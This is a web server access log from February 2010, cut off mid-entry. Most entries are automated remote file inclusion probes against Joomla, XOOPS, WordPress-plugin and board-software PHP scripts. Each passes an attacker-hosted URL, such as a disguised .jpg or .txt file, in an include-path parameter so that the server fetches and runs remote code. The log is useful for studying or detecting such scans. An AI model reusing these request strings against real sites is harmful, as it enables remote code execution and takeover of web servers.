80.82.114.106 - - [13/Feb/2010:10:17:01 -0800] "GET /logs/access_100204.log%20%20//modify.php?dir_module=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [13/Feb/2010:10:17:01 -0800] "GET /modify.php?dir_module=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [13/Feb/2010:10:17:01 -0800] "GET /logs//modify.php?dir_module=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [13/Feb/2010:10:17:21 -0800] "GET /logs/access_100208.log%20%20//modify.php?dir_module=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [13/Feb/2010:10:17:26 -0800] "GET /logs//modify.php?dir_module=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [13/Feb/2010:10:17:26 -0800] "GET /logs/access_100204.log%20%20//modify.php?dir_module=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [13/Feb/2010:10:17:26 -0800] "GET /modify.php?dir_module=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [13/Feb/2010:10:17:26 -0800] "GET /logs//modify.php?dir_module=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [13/Feb/2010:10:17:26 -0800] "GET /logs/access_100204.log%20%20//modify.php?dir_module=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [13/Feb/2010:10:17:26 -0800] "GET /modify.php?dir_module=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.96.168.169 - - [13/Feb/2010:10:17:28 -0800] "GET /modify.php?dir_module=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.96.168.169 - - [13/Feb/2010:10:17:29 -0800] "GET /logs//modify.php?dir_module=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.96.168.169 - - [13/Feb/2010:10:17:29 -0800] "GET /logs/access_100204.log%20%20//modify.php?dir_module=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [13/Feb/2010:10:17:35 -0800] "GET /logs/access_100208.log%20%20//modify.php?dir_module=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [13/Feb/2010:10:17:36 -0800] "GET /logs/access_100112.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [13/Feb/2010:10:17:37 -0800] "GET /logs/access_100208.log%20%20//modify.php?dir_module=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [13/Feb/2010:10:17:38 -0800] "GET /logs/access_100204.log//modify.php?dir_module=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [13/Feb/2010:10:17:38 -0800] "GET /modify.php?dir_module=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [13/Feb/2010:10:17:38 -0800] "GET /logs//modify.php?dir_module=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.96.168.169 - - [13/Feb/2010:10:17:39 -0800] "GET /logs/access_100208.log%20%20//modify.php?dir_module=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:10:17:41 -0800] "GET /logs/access_100204.log%20%20//modify.php?dir_module=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:10:17:41 -0800] "GET /logs//modify.php?dir_module=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:10:17:41 -0800] "GET /modify.php?dir_module=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:10:17:46 -0800] "GET /logs//modify.php?dir_module=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:10:17:46 -0800] "GET /logs/access_100204.log%20%20//modify.php?dir_module=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:10:17:46 -0800] "GET /modify.php?dir_module=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [13/Feb/2010:10:17:47 -0800] "GET /logs/access_100109.log//modify.php?dir_module=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [13/Feb/2010:10:17:48 -0800] "GET /logs/access_100112.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:10:17:50 -0800] "GET /logs/access_100204.log%20%20//modify.php?dir_module=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:10:17:50 -0800] "GET /logs//modify.php?dir_module=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:10:17:50 -0800] "GET /modify.php?dir_module=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:10:17:50 -0800] "GET /logs/access_100208.log%20%20//modify.php?dir_module=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:10:17:54 -0800] "GET /logs/access_100208.log%20%20//modify.php?dir_module=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:10:17:57 -0800] "GET /modify.php?dir_module=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:10:17:57 -0800] "GET /logs/access_100204.log%20%20//modify.php?dir_module=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:10:17:57 -0800] "GET /logs//modify.php?dir_module=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:10:17:59 -0800] "GET /logs/access_100208.log%20%20//modify.php?dir_module=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:10:18:12 -0800] "GET /logs/access_100208.log%20%20//modify.php?dir_module=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:10:18:13 -0800] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:10:18:13 -0800] "GET /logs/access_100123.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:10:18:13 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [13/Feb/2010:10:18:24 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [13/Feb/2010:10:18:24 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [13/Feb/2010:10:18:24 -0800] "GET /logs/access_100126.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.96.168.169 - - [13/Feb/2010:10:18:28 -0800] "GET /modify.php?dir_module=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.96.168.169 - - [13/Feb/2010:10:18:28 -0800] "GET /logs/access_100204.log//modify.php?dir_module=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.96.168.169 - - [13/Feb/2010:10:18:28 -0800] "GET /logs//modify.php?dir_module=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.96.168.169 - - [13/Feb/2010:10:18:32 -0800] "GET /logs/access_100208.log//modify.php?dir_module=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:10:18:33 -0800] "GET /logs//modify.php?dir_module=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:10:18:33 -0800] "GET /logs/access_100204.log%20%20//modify.php?dir_module=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:10:18:33 -0800] "GET /modify.php?dir_module=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [13/Feb/2010:10:18:51 -0800] "GET /logs/access_100112.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:10:19:00 -0800] "GET /logs/access_100115.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:10:19:01 -0800] "GET /logs/access_100123.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:10:19:12 -0800] "GET /modify.php?dir_module=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:10:19:12 -0800] "GET /logs/access_100204.log%20%20//modify.php?dir_module=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:10:19:17 -0800] "GET /logs//modify.php?dir_module=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.161.132 - - [13/Feb/2010:10:19:33 -0800] "GET /modify.php?dir_module=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.161.132 - - [13/Feb/2010:10:19:33 -0800] "GET /logs//modify.php?dir_module=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.161.132 - - [13/Feb/2010:10:19:34 -0800] "GET /logs/access_100208.log//modify.php?dir_module=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [13/Feb/2010:10:19:35 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [13/Feb/2010:10:19:35 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [13/Feb/2010:10:19:35 -0800] "GET /logs/access_100131.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:10:19:37 -0800] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:10:19:37 -0800] "GET /logs/access_100123.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:10:19:37 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [13/Feb/2010:10:19:46 -0800] "GET /logs/access_100126.log%20%20/*include/write.php?dir=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:10:19:51 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:10:19:51 -0800] "GET /logs/access_100123.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:10:19:51 -0800] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [13/Feb/2010:10:19:57 -0800] "GET /modify.php?dir_module=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [13/Feb/2010:10:20:02 -0800] "GET /logs//modify.php?dir_module=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [13/Feb/2010:10:20:02 -0800] "GET /logs/access_100204.log%20%20//modify.php?dir_module=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.161.132 - - [13/Feb/2010:10:20:09 -0800] "GET /logs/access_100119.log//modify.php?dir_module=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [13/Feb/2010:10:20:10 -0800] "GET /logs/access_100208.log%20%20//modify.php?dir_module=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:10:20:14 -0800] "GET /appserv/main.php?appserv_root=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:10:20:14 -0800] "GET /logs//appserv/main.php?appserv_root=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:10:20:14 -0800] "GET /logs/access_100126.log%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:10:20:14 -0800] "GET /logs/access_100103.log%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:10:20:21 -0800] "GET /logs/access_100115.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [13/Feb/2010:10:20:22 -0800] "GET /logs/access_100126.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:10:20:23 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:10:20:23 -0800] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:10:20:23 -0800] "GET /logs/access_100208.log%20%20//modify.php?dir_module=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:10:20:23 -0800] "GET /logs/access_100123.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:10:20:26 -0800] "GET /logs/access_100208.log%20%20//modify.php?dir_module=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [13/Feb/2010:10:20:29 -0800] "GET /logs/access_100109.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [13/Feb/2010:10:20:35 -0800] "GET /logs/access_100126.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [13/Feb/2010:10:20:35 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [13/Feb/2010:10:20:35 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:10:20:41 -0800] "GET /logs//appserv/main.php?appserv_root=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:10:20:41 -0800] "GET /appserv/main.php?appserv_root=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:10:20:41 -0800] "GET /logs/access_100126.log%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:10:20:41 -0800] "GET /logs/access_100103.log%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:10:20:45 -0800] "GET /modify.php?dir_module=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:10:20:52 -0800] "GET /logs/access_100204.log%20%20//modify.php?dir_module=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:10:20:52 -0800] "GET /logs//modify.php?dir_module=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:10:20:59 -0800] "GET /logs/access_100208.log%20%20//modify.php?dir_module=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.161.132 - - [13/Feb/2010:10:21:11 -0800] "GET /logs/access_100204.log%20%20//modify.php?dir_module=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.161.132 - - [13/Feb/2010:10:21:11 -0800] "GET /logs//modify.php?dir_module=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [13/Feb/2010:10:21:17 -0800] "GET /logs/access_100107.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [13/Feb/2010:10:21:17 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [13/Feb/2010:10:21:18 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
220.73.161.132 - - [13/Feb/2010:10:21:24 -0800] "GET /logs/access_100208.log%20%20//modify.php?dir_module=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [13/Feb/2010:10:21:31 -0800] "GET /logs/access_100126.log%20%20/*include/write.php?dir=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [13/Feb/2010:10:21:51 -0800] "GET /logs/access_100117.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:10:22:37 -0800] "GET /board//delete_all.php?board_skin_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:10:22:37 -0800] "GET /logs/access_100120.log%20%20//board//delete_all.php?board_skin_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:10:22:37 -0800] "GET /logs//board//delete_all.php?board_skin_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:10:23:19 -0800] "GET ///bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:10:23:19 -0800] "GET /logs////bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:10:23:20 -0800] "GET /logs/access_100202.log%20%20////bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [13/Feb/2010:10:23:30 -0800] "GET /logs/access_100121.log%20%20//board//delete_all.php?board_skin_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.61 - - [13/Feb/2010:10:23:38 -0800] "GET /logs/access_100103.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.sedu.co.kr/sh/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:10:23:40 -0800] "GET /logs/access_100121.log%20%20////bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.61 - - [13/Feb/2010:10:23:43 -0800] "GET /logs/access_100201.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.sedu.co.kr/sh/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [13/Feb/2010:10:23:44 -0800] "GET /logs/access_100107.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [13/Feb/2010:10:23:44 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [13/Feb/2010:10:23:44 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.61 - - [13/Feb/2010:10:23:50 -0800] "GET /logs/access_100103.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.sedu.co.kr/sh/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.61 - - [13/Feb/2010:10:23:55 -0800] "GET /logs/access_100201.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.sedu.co.kr/sh/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [13/Feb/2010:10:23:58 -0800] "GET /logs/access_100204.log/convert/mvcw.php?step=http://www.yuiwo